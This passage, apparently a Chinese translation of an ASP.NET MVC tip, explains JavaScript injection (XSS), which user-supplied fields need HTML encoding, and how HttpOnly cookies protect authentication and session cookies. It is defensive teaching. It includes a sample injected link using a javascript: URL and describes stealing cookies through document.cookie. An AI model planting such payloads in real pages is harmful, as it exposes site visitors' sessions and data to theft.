哪些内容需要编码

注意在前面的代码中，我并没有对EntryDate属性进行编码。在向页面显示EntryDate属性时无需进行编码的原因有二。

首先，EntryDate并不是由网站的访问者输入的。EntryDate属性的值是由代码生成的。黑客无法在这里注入危险代码。

假设的确是由访问者来输入EntryDate属性。由于EntryDate在SQL Server数据库中是作为DateTime类型存放的，黑客也不可能向其中注入恶意代码。因此，你无须担心是否需要对该属性进行编码。

通常，任何时候你在接受用户输入的文本内容时都要注意JavaScript注入攻击。例如，要小心地显示用户名。如果你允许用户创建属于他们自己的用户名，则用户可能偷偷地将一个恶意JavaScript字符串放在他们的用户名中（或一个指向色情图片的img标签）。

另外，小心超链接。很多blog应用程序允许匿名用户在发表评论时填写他们的网站链接。黑客可能会向链接中嵌入而已JavaScript。下面是一个简单的例子：

<a href="javascript:alert('Something Evil!')">Mr. Hacker</a>

当你单击该链接时，JavaScript就会执行。在这种情况下，没有什么恶劣的事发生。但是，你可能执行的是窃取表单数据或cookies数据的代码。

验证、会话状态和HttpOnly Cookies

你可以利用JavaScript注入攻击来窃取Cookies。例如，你将用户的信用卡号存放在一个Cookies中，然后你可以向页面中注入JavaScript，使用document.cookie DOM属性来截取信用卡号。

ASP.NET Forms Authentication和ASP.NET Session State都使用Cookie。Forms Authentication依赖于一个存放在名为.ASPXAUTH的Cookie中的验证票据（Ticket）。Session State使用一个名为ASP.NET_SessionId的Cookie。如果可以窃取这些Cookies，你就能模仿其他网站用户并且去用户的会话状 态信息。

幸运的是，Microsoft对此采取了预防措施，使得很难窃取 Forms Authentication和Session State Cookies。它们的Cookies都是HttpOnly Cookie。HttpOnly Cookie是一种特殊的Cookie，它不能通过客户端代码读取。你只能在Web服务器上读取HttpOnly Cookie。

Microsoft Internet Explorer、Firefox和Opera都支持HttpOnly Cookies。Safari和一些比较老的浏览器——很不幸——不支持。因此，你仍需要注意为所有用户输入数据进行HTML编码，以避免黑客盗取 Forms Authentication和Session State Cookie。

小结

该Tip的目的是通过恐吓教会你做正确的事情。正如在简介中提到那样，JavaScript注入攻击是最常见的安全攻击类型。很多开发者并没有花费太多时间关心它。希望该Tip能够让你注意，每当在MVC视图中显示从用户那里收集来得数据时，都要进行编码。

你可以通过点击下面的链接来尝试本文讨论的代码。当你输入用户名和密码后，单击登录表单中的按钮，用户名和密码会出现在StolenPasswords数据库表中。
此处下载源代码：http://weblogs.asp.net/blogs/stephenwalther/Downloads/Tip7/Tip7.zip。